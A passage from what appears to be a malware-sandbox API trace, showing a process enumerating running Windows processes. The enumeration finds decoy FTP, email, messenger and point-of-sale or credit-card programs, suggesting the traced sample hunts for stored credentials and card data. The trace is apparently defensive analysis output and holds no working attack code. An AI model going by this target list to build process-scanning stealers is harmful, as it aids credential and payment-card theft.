pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0234.616] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.618] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.620] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.622] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.624] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.626] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0234.632] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0234.635] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0234.638] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0234.640] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0234.643] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0234.645] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0234.648] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0234.650] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0234.653] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0234.655] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0234.657] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0234.661] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0234.663] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0234.666] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0234.671] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0234.673] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0234.677] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0234.680] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0234.682] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0234.685] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0234.687] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0234.690] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0234.692] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0234.696] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0234.699] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0234.702] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0234.704] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0234.712] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0234.714] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0234.717] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0234.719] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0234.722] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0234.724] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0234.727] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0234.729] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0234.731] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0234.733] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0234.736] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0234.738] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0234.740] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0234.743] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0234.745] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0234.749] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0234.753] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0234.755] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0234.757] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0234.759] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0234.761] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0234.763] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0234.766] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0234.768] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0234.770] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0234.772] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0234.774] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0234.776] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0234.778] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0234.780] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0234.782] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0234.784] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0234.788] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0234.790] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.793] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0234.795] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.798] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.800] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0234.802] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.804] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0234.807] CloseHandle (hObject=0x2260) returned 1 [0234.807] Sleep (dwMilliseconds=0x64) [0234.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x222c [0234.942] Process32First (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.945] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.947] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.950] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.952] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.955] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.000] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.003] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.006] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.010] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.012] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.015] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 